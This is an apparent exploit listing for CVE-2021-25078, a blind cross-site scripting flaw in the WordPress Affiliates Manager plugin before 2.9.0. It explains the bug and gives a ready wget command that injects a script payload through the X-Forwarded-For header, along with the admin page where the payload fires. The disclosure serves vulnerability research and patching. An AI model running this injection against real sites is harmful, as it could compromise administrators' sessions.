WordPress CVE-2021-25078 Exploit - Affiliates Manager < 2.9.0 - Blind Cross Site Scripting (WordPress Plugin)

[Dark]

[CVE-2021-25078] - Affiliates Manager < 2.9.0 - Blind Cross Site Scripting

Product: WordPress Plugin (Affiliates Manager < 2.9.0)

Severity: Medium (6.1)

Explanation: An unauthenticated user can send xss payloads in http headers (e.g.: X-Forwarded-For: <script>alert(123)</script>) when visiting vulnerable wordpress website, and full http logs appear in admin panel without sanitizing, it causes blind xss vulnerability.

Quick Exploit:

As Unauthenticated User:
wget "https://wordpress-site.com/?wpam_id=1" --header="X-Forwarded-For: <img src onerror=alert(/XSS/)>" -q -O-



XSS will be executed when administrator enters:
https://wordpres-site.com/wp-admin/admin.php?page=wpam-clicktracking



Proof of Concept (Affiliates Manager Plugin v2.8.4):


Crafting and Sending exploit:

Creating normal request for understanding which side has been affected.

Finally, we got it.

​